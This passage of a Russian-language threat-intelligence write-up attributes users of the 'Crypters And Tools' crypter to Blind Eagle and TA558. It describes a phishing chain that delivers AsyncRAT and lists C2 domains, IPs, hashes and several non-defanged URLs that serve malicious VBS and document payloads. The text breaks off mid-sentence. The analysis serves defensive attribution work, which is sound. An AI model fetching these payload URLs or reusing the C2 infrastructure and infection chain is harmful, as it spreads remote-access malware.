\u043f\u0430\u0442\u0442\u0435\u0440\u043d strekhostYYYY, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, strekhost2024[.]duckdns[.]org. \u042d\u0442\u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u0431\u044b\u043b\u0438 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b \u043a \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 Blind Eagle \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Zscaler, \u0441\u0443\u0434\u044f \u043f\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u043c\u0443<a href=\"https:\/\/github.com\/ThreatLabz\/iocs\/blob\/main\/blindeagle\/blindeagle_domains.txt\"> \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044e \u043d\u0430 GitHub<\/a>.<\/p>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u0438\u0445 \u0434\u043e\u043c\u0435\u043d\u043e\u0432, \u0431\u044b\u043b\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0440\u0443\u0433\u0438\u0445, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e:<\/p>\n<ul>\n<li>\n<p>deadpoolstart2025.duckdns.org<\/p>\n<\/li>\n<li>\n<p>deadpoolstart2026.duckdns.org<\/p>\n<\/li>\n<li>\n<p>deadpoolstart2051.duckdns.org<\/p>\n<\/li>\n<\/ul>\n<p>\u0422\u0430\u043a\u0436\u0435 \u043d\u0430 \u0434\u0440\u0443\u0433\u043e\u043c IP 179.14.11.213 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0435\u0449\u0451 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0441\u0438\u0439 deadpoolstart \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0433\u043e\u0434\u0430\u043c\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 &#8212; deadpoolstart2035.duckdns.org.<\/p>\n<p>\u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 Crypters And Tools \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c deadpoolstart2025.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a4d\/f57\/9f0\/a4df579f0b295fb239f756d741fd9bec.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 32. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 deadpoolstart2025\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 32. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 deadpoolstart2025\" width=\"631\" height=\"373\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a4d\/f57\/9f0\/a4df579f0b295fb239f756d741fd9bec.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a4d\/f57\/9f0\/a4df579f0b295fb239f756d741fd9bec.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 32. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 deadpoolstart2025<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0434\u043d\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a \u0435\u0433\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c.<\/p>\n<p>14 \u043d\u043e\u044f\u0431\u0440\u044f 2024 \u0433\u043e\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e c \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u043c \u0432 \u043b\u0438\u0446\u0435 \u043a\u043e\u043b\u0443\u043c\u0431\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u0438\u0445 \u043b\u0435\u043a\u0430\u0440\u0441\u0442\u0432:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/881\/5ca\/7ec\/8815ca7ec341328f52864a66572f14d5.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 33. \u041f\u0438\u0441\u044c\u043c\u043e, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 33. \u041f\u0438\u0441\u044c\u043c\u043e, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c\" width=\"541\" height=\"357\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/881\/5ca\/7ec\/8815ca7ec341328f52864a66572f14d5.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/881\/5ca\/7ec\/8815ca7ec341328f52864a66572f14d5.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 33. \u041f\u0438\u0441\u044c\u043c\u043e, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c<\/figcaption><\/div>\n<\/figure>\n<p>\u0421\u0441\u044b\u043b\u043a\u0430 \u0432\u0435\u043b\u0430 \u043d\u0430 google drive, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0441\u044f \u0437\u0430\u043f\u0430\u0440\u043e\u043b\u0435\u043d\u043d\u044b\u0439 \u0430\u0440\u0445\u0438\u0432 \u201cFOLIO_INCONSISTENCIA_REVISION_FISCAL_CARTERA_DETALLES_DETALLES_AMPLIADOS_CODIGO_VERIFICACION_ad851874148487ff17817ca2545434453154617ff5464484171525541748594ca6544981894ff11258749565284_XML.rar\u201d (SHA-256: 5fe3f4e4ab026fbcd0b595c7b35eb3b3997cae0fc8b92728b0bd556a3ec3c092). \u041f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0430\u0440\u0445\u0438\u0432\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0441\u044f \u0432 \u0442\u0435\u043b\u0435 \u0441\u0430\u043c\u043e\u0433\u043e \u043f\u0438\u0441\u044c\u043c\u0430, \u0430 \u0432\u043d\u0443\u0442\u0440\u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0441\u044f VBS-\u0444\u0430\u0439\u043b (SHA-256: 937fcba2f15c795a209032a36a921fe9f53ea7a47e7295573cd1c0ebb8d9d241. \u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 VBS \u043f\u0440\u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0441\u044f \u0432 \u0430\u0432\u0442\u043e\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441 \u0440\u0435\u0441\u0443\u0440\u0441\u0430 <a href=\"http:\/\/paste.ee\">paste.ee<\/a>.<\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0441 <a href=\"http:\/\/paste.ee\">paste.ee<\/a> \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0432 base64 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0441 \u0443\u0436\u0435 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u043e\u0439 $Codigo. \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u043a\u0440\u0438\u043f\u0442 \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0447\u0435\u0440\u0435\u0437 API \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Crypters And Tools \u2013 <a href=\"http:\/\/1017.filemail.com\">1017.filemail.com<\/a>, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u043a <a href=\"http:\/\/files.catbox.moe\">files.catbox.moe<\/a>. \u0412 \u0438\u0442\u043e\u0433\u0435, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u043b\u0441\u044f AsyncRAT c \u04212, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u0436\u0435 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u0441\u0430\u043c\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u0430 \u043d\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0443 \u2013 deadpoolstart2025.duckdns.org (181.71.217.114).<\/p>\n<p>\u041c\u044b \u043d\u0430\u0448\u043b\u0438 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0438 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 \u043d\u043e\u044f\u0431\u0440\u044f 2024 \u043f\u043e \u0444\u0435\u0432\u0440\u0430\u043b\u044c 2025. \u0412\u043e \u0432\u0441\u0435\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Asyncrat. \u041c\u044b \u043e\u0431\u0440\u0430\u0442\u0438\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e mutex asyncrat \u0432 \u044d\u0442\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0431\u044b\u043b \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u043c:<\/p>\n<ul>\n<li>\n<p>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzNUEVOHOSTMALDITASEA<\/p>\n<\/li>\n<\/ul>\n<p>\u0421 \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u201cnuevo host maldita sea\u201d \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0438\u0442\u0441\u044f, \u043a\u0430\u043a \u201c\u043d\u043e\u0432\u044b\u0439 \u0445\u043e\u0437\u044f\u0438\u043d, \u0447\u0435\u0440\u0442 \u0432\u043e\u0437\u044c\u043c\u0438\u201d<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u0441\u0435\u0440\u0432\u0435\u0440 Crypters And Tools. \u042d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u043c \u0447\u0435\u0440\u0435\u0437 API. \u041e\u0434\u0438\u043d \u0438\u0437 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0441\u0443\u0434\u044f \u043f\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u0430\u043f\u0440\u043e\u0441\u0443 \u2013 \u043d\u0435\u043a\u0438\u0439 ABBAS:<\/p>\n<p>http:\/\/91.92.254.29\/Users_API\/ABBAS\/file_odpxh4oq.2bf.txtn<\/p>\n<p>\u0415\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0430\u0442\u0430\u043a\u0438, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u044f\u0432\u043d\u044b\u0435 \u043a\u043e\u0440\u0440\u0435\u043b\u044f\u0446\u0438\u0438 \u0441 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 Blind Eagle, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 IP \u0430\u0434\u0440\u0435\u0441\u0430 191.93.113.10 \u0438 152.201.184.91, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0445\u043e\u0441\u0442\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0445 \u0434\u043b\u044f Blind Eagle \u043a\u043e\u043b\u0443\u043c\u0431\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u0445. \u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u0441\u0430\u043c\u0430 \u0430\u0442\u0430\u043a\u0430 \u043a\u043e\u0440\u0440\u0435\u043b\u0438\u0440\u0443\u0435\u0442 \u0441<a href=\"https:\/\/research.checkpoint.com\/2025\/blind-eagle-and-justice-for-all\/\"> \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435\u043c Checkpoint<\/a>.<\/p>\n<p>\u042d\u0442\u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0431\u0430\u0437 \u0434\u0430\u043d\u043d\u044b\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043b\u0438 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Crypters And Tools.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/afd\/48f\/43d\/afd48f43dd8db373486a0de922c84917.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 34.1 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 ABBAS\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 34.1 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 ABBAS\" width=\"593\" height=\"370\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/afd\/48f\/43d\/afd48f43dd8db373486a0de922c84917.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/afd\/48f\/43d\/afd48f43dd8db373486a0de922c84917.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 34.1 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 ABBAS<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8ff\/86f\/3c9\/8ff86f3c93433a7b99204609d7cd162c.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 34.2 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 ABBAS\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 34.2 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 ABBAS\" width=\"586\" height=\"298\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/8ff\/86f\/3c9\/8ff86f3c93433a7b99204609d7cd162c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8ff\/86f\/3c9\/8ff86f3c93433a7b99204609d7cd162c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 34.2 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 ABBAS<\/figcaption><\/div>\n<\/figure>\n<p>\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 bukky101, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0442\u043e\u0447\u043d\u043e \u0430\u0442\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043a Aggah \u0438\u043b\u0438 TA558, \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 deadpoolstart2025 \u0438 ABBAS \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044e Blind Eagle, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044f\u0437\u044b\u043a, \u0436\u0435\u0440\u0442\u0432, \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u0443\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0442.\u0434., \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043c\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u043c, \u0447\u0442\u043e deadpoolstart2025 \u0438 abbas \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0447\u043b\u0435\u043d\u0430\u043c\u0438 Blind Eagle \u0438\u043b\u0438 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u044e\u0442 \u0441 \u044d\u0442\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439.<\/p>\n<p><a class=\"anchor\" name=\"7.3\" id=\"7.3\"><\/a><\/p>\n<h3>7.3 TA558: Brainiac, syscore \u0438 negrocock<\/h3>\n<p>\u041a\u0430\u043a \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c ABBAS, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Crypters And Tools \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0435\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a Blind Eagle \u0438 TA558.<\/p>\n<p>\u0411\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u0434\u0432\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2013 BrainiacMax \u0438 syscore, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0447\u0435\u0440\u0435\u0437 API \u0441 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430:<\/p>\n<ul>\n<li>\n<p><a href=\"http:\/\/91.92.254.14\/Users_API\/BrainiacMAX\/file_ksg3fckt.hot.txt\">http:\/\/91.92.254.14\/Users_API\/BrainiacMAX\/file_ksg3fckt.hot.txt<\/a><\/p>\n<\/li>\n<li>\n<p>http:\/\/66.70.160.254\/Users_API\/syscore\/file_ikvt3ei1.mgv.txt<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u0433\u043b\u0430\u0432\u0435 \u201c\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b TA558\u201d \u00a0\u043c\u044b \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0447\u0435\u0440\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0443. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0430\u0442\u0430\u043a\u0438 BrainiacMax \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0422\u0410558 \u2013 \u0445\u043e\u0441\u0442\u044b \u043d\u0430 AS-COLOCROSSING \u0438 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f:<\/p>\n<ul>\n<li>\n<p><a href=\"http:\/\/192.3.216.148\/uh.ee.uh.ee.uhuheee.doc\">http:\/\/192.3.216.148\/uh.ee.uh.ee.uhuheee.doc<\/a><\/p>\n<\/li>\n<li>\n<p>http:\/\/192.3.216.148\/datingloverstartingAgain.vbs<\/p>\n<\/li>\n<\/ul>\n<p>\u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0430 \u043b\u0435\u0433\u0430\u043b\u044c\u043d\u044b\u0439 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 SMTP \u0441\u0435\u0440\u0432\u0435\u0440 \u0432 \u0420\u0443\u043c\u044b\u043d\u0438\u0438, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f TA558 \u0438 \u0447\u0442\u043e \u043c\u044b \u0432\u0438\u0434\u0435\u043b\u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043d\u0430\u0448\u0435\u0433\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u043e \u044d\u0442\u0443 \u0433\u0440\u0443\u043f\u043f\u0443.<\/p>\n<p>\u0421 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c syscore \u043f\u043e\u0445\u043e\u0436\u0430\u044f \u0438\u0441\u0442\u043e\u0440\u0438\u044f. \u0412 \u0430\u0442\u0430\u043a\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f Excel \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441 